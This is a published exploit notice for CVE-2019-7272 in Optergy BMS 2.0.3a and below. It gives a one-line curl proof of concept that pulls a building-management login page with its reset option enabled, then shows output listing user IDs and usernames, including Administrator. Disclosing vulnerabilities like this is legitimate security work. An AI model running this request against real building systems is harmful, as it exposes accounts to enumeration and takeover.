Optergy BMS 2.0.3a Account Reset / Username Disclosure

Optergy BMS versions 2.0.3a and below account reset and username disclosure exploit.


MD5 | a1f66a4c127348cbe47ec39981351c17


Optergy BMS Account Reset and Username Disclosure

Affected version <=2.0.3a (Proton and Enterprise)
Discovered by Gjoko 'LiquidWorm' Krstic

CVE: CVE-2019-7272
Advisory: https://applied-risk.com/resources/ar-2019-008

PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>

Related Posts